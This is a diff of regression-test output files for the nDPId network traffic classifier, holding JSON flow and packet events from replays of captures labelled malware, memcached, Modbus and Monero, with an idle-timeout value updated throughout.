{"version":"TLSv1.2","client_requested_server_name":"www.internetbadguys.com","server_names":"api.opendns.com,branded-login.opendns.com,cachecheck.opendns.com,community.opendns.com,dashboard2.opendns.com,dashboard.opendns.com,dashboard-ipv4.opendns.com,msp-login.opendns.com,api-ipv4.opendns.com,api-ipv6.opendns.com,authz.api.opendns.com,domain.opendns.com,help.vpn.opendns.com,ideabank.opendns.com,login.opendns.com,netgear.opendns.com,reseller-login.opendns.com,images.opendns.com,images-using.opendns.com,store.opendns.com,signup.opendns.com,twilio.opendns.com,updates.opendns.com,shared.opendns.com,tools.opendns.com,cache.opendns.com,api.umbrella.com,branded-login.umbrella.com,cachecheck.umbrella.com,community.umbrella.com,dashboard2.umbrella.com,dashboard.umbrella.com,dashboard-ipv4.umbrella.com,msp-login.umbrella.com,api-ipv4.umbrella.com,api-ipv6.umbrella.com,authz.api.umbrella.com,domain.umbrella.com,help.vpn.umbrella.com,ideabank.umbrella.com,login.umbrella.com,netgear.umbrella.com,reseller-login.umbrella.com,images.umbrella.com,images-using.umbrella.com,store.umbrella.com,signup.umbrella.com,twilio.umbrella.com,updates.umbrella.com,shared.umbrella.com,tools.umbrella.com,cache.umbrella.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"0c0aff9ccea5e7e1de5c3a0069d103f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=OpenDNS, Inc., CN=api.opendns.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"21:B4:CF:84:13:3A:21:A4:B0:02:63:76:39:84:EA:ED:27:EE:51:7C"}}
00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571476362,"flow_last_seen":1569571476362,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","src_port":33706,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571476362,"flow_last_seen":1569571476362,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","src_port":33706,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1569579416636,"flow_last_seen":1569579417280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6018,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Network"}}
00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569571470672,"flow_last_seen":1569571470672,"flow_idle_time":120000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569579408876,"flow_last_seen":1569579409087,"flow_idle_time":7440000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":373,"flow_avg_l4_payload_len":186,"midstream":1,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":48394,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569579408876,"flow_last_seen":1569579409087,"flow_idle_time":7560000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":373,"flow_avg_l4_payload_len":186,"midstream":1,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":48394,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569571466977,"flow_last_seen":1569571467001,"flow_idle_time":180000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"1.1.1.1","src_port":42370,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","packets-captured":26,"packets-processed":26,"total-skipped-flows":0,"total-l4-data-len":6587,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":4,"total-detection-updates":3,"total-updates":0,"current-active-flows":0,"total-active-flows":5,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":31,"global_ts_msec":1569579417280}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~

12
test/results/memcached.cap.out
View File

@@ -1,11 +1,11 @@
00459{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"memcached.cap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"memcached.cap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1534343745954}
00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534343745954,"flow_last_seen":1534343745954,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534343745954,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":59604,"dst_port":11211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1534343745954,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1534343745954,"pkt":"AAAAAAAAAAAAAAAACABFAAA8pT5AAEAGl3t\/AAABfwAAAejUK8sskd7QAAAAAKACqqr+MAAAAgT\/1wQCCAopIHvuAAAAAAEDAwc="}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1534343745954,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1534343745954,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAASvL6NTLJnx6LJHe0aASqqr+MAAAAgT\/1wQCCAopIHvuKSB77gEDAwc="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1534343745954,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1534343745954,"pkt":"AAAAAAAAAAAAAAAACABFAAA0pT9AAEAGl4J\/AAABfwAAAejUK8sskd7RyyZ8e4AQAVb+KAAAAQEICikge+4pIHvu"}
00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1534343745954,"flow_last_seen":1534343745954,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1028,"flow_tot_l4_payload_len":1035,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1534343745954,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":59604,"dst_port":11211,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Memcached","breed":"Acceptable","category":"Network"}}
00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":10,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1534343745954,"flow_last_seen":1534343745954,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1028,"flow_tot_l4_payload_len":1035,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1534343745954,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":59604,"dst_port":11211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Memcached","breed":"Acceptable","category":"Network"}}
00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534343745954,"flow_last_seen":1534343745954,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534343745954,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":59604,"dst_port":11211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1534343745954,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1534343745954,"pkt":"AAAAAAAAAAAAAAAACABFAAA8pT5AAEAGl3t\/AAABfwAAAejUK8sskd7QAAAAAKACqqr+MAAAAgT\/1wQCCAopIHvuAAAAAAEDAwc="}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1534343745954,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1534343745954,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAASvL6NTLJnx6LJHe0aASqqr+MAAAAgT\/1wQCCAopIHvuKSB77gEDAwc="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1534343745954,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1534343745954,"pkt":"AAAAAAAAAAAAAAAACABFAAA0pT9AAEAGl4J\/AAABfwAAAejUK8sskd7RyyZ8e4AQAVb+KAAAAQEICikge+4pIHvu"}
00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1534343745954,"flow_last_seen":1534343745954,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1028,"flow_tot_l4_payload_len":1035,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1534343745954,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":59604,"dst_port":11211,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Memcached","breed":"Acceptable","category":"Network"}}
00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":10,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1534343745954,"flow_last_seen":1534343745954,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1028,"flow_tot_l4_payload_len":1035,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1534343745954,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":59604,"dst_port":11211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Memcached","breed":"Acceptable","category":"Network"}}
00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":10,"source":"memcached.cap","alias":"nDPId-test","packets-captured":10,"packets-processed":10,"total-skipped-flows":0,"total-l4-data-len":1035,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1534343745954}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 10/10

12
test/results/modbus.pcap.out
View File

@@ -1,11 +1,11 @@
00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"modbus.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"modbus.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1223541953927}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1223541953927,"flow_last_seen":1223541953927,"flow_idle_time":7440000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1223541953927,"l3_proto":"ip4","src_ip":"192.168.110.131","dst_ip":"192.168.110.138","src_port":2074,"dst_port":502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1223541953927,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1223541953927,"pkt":"ABzAX0kKAArkxYMKCABFAAA0i\/1AAIAGEGjAqG6DwKhuiggaAfZB0urG4RU6zlAY\/MYAMgAAANEAAAAGAQMAAQAB"}
00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1223541953927,"flow_last_seen":1223541953927,"flow_idle_time":7440000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1223541953927,"l3_proto":"ip4","src_ip":"192.168.110.131","dst_ip":"192.168.110.138","src_port":2074,"dst_port":502,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Modbus","breed":"Acceptable","category":"IoT-Scada"}}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1223541953929,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":65,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":65,"pkt_l4_len":31,"thread_ts_msec":1223541953929,"pkt":"AArkxYMKABzAX0kKCABFAAAzO9pAAIAGYIzAqG6KwKhugwH2CBrhFTrOQdLq0lAY++v\/BAAAANEAAAAFAQMCAAA="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1223541953929,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1223541953929,"pkt":"ABzAX0kKAArkxYMKCABFAAA0i\/5AAIAGEGfAqG6DwKhuiggaAfZB0urS4RU62VAY\/LsAJgAAANIAAAAGAQMAAAAB"}
00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":102,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":102,"flow_first_seen":1223541953927,"flow_last_seen":1223541977037,"flow_idle_time":7440000,"flow_min_l4_payload_len":11,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":1173,"flow_avg_l4_payload_len":11,"midstream":1,"thread_ts_msec":1223541977037,"l3_proto":"ip4","src_ip":"192.168.110.131","dst_ip":"192.168.110.138","src_port":2074,"dst_port":502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Modbus","breed":"Acceptable","category":"IoT-Scada"}}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1223541953927,"flow_last_seen":1223541953927,"flow_idle_time":7560000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1223541953927,"l3_proto":"ip4","src_ip":"192.168.110.131","dst_ip":"192.168.110.138","src_port":2074,"dst_port":502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1223541953927,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1223541953927,"pkt":"ABzAX0kKAArkxYMKCABFAAA0i\/1AAIAGEGjAqG6DwKhuiggaAfZB0urG4RU6zlAY\/MYAMgAAANEAAAAGAQMAAQAB"}
00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1223541953927,"flow_last_seen":1223541953927,"flow_idle_time":7560000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1223541953927,"l3_proto":"ip4","src_ip":"192.168.110.131","dst_ip":"192.168.110.138","src_port":2074,"dst_port":502,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Modbus","breed":"Acceptable","category":"IoT-Scada"}}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1223541953929,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":65,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":65,"pkt_l4_len":31,"thread_ts_msec":1223541953929,"pkt":"AArkxYMKABzAX0kKCABFAAAzO9pAAIAGYIzAqG6KwKhugwH2CBrhFTrOQdLq0lAY++v\/BAAAANEAAAAFAQMCAAA="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1223541953929,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1223541953929,"pkt":"ABzAX0kKAArkxYMKCABFAAA0i\/5AAIAGEGfAqG6DwKhuiggaAfZB0urS4RU62VAY\/LsAJgAAANIAAAAGAQMAAAAB"}
00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":102,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":102,"flow_first_seen":1223541953927,"flow_last_seen":1223541977037,"flow_idle_time":7560000,"flow_min_l4_payload_len":11,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":1173,"flow_avg_l4_payload_len":11,"midstream":1,"thread_ts_msec":1223541977037,"l3_proto":"ip4","src_ip":"192.168.110.131","dst_ip":"192.168.110.138","src_port":2074,"dst_port":502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Modbus","breed":"Acceptable","category":"IoT-Scada"}}
00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":102,"source":"modbus.pcap","alias":"nDPId-test","packets-captured":102,"packets-processed":102,"total-skipped-flows":0,"total-l4-data-len":1173,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1223541977037}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 102/102

24
test/results/monero.pcap.out
View File

@@ -1,18 +1,18 @@
00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"monero.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"monero.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1514196188350}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1514196188350,"flow_last_seen":1514196188350,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1514196188350,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"94.23.199.191","src_port":46838,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1514196188350,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1514196188350,"pkt":"fmgbW\/gUcIXCQ0+iCABFAAA8e7pAAEAG1e7AqAKUXhfHv7b2DQVL2\/baAAAAAKACchDZewAAAgQFtAQCCAocofANAAAAAAEDAwc="}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1514196188430,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1514196188430,"pkt":"cIXCQ0+ifmgbW\/gUCABF4AA8AABAADEGX8leF8e\/wKgClA0FtvbB2Ar1S9v226AScSCYUwAAAgQFtAQCCArnhI20HKHwDQEDAwc="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1514196188430,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1514196188430,"pkt":"fmgbW\/gUcIXCQ0+iCABFAAA0e7tAAEAG1fXAqAKUXhfHv7b2DQVL2\/bbwdgK9oAQAOU3CgAAAQEIChyh8F7nhI20"}
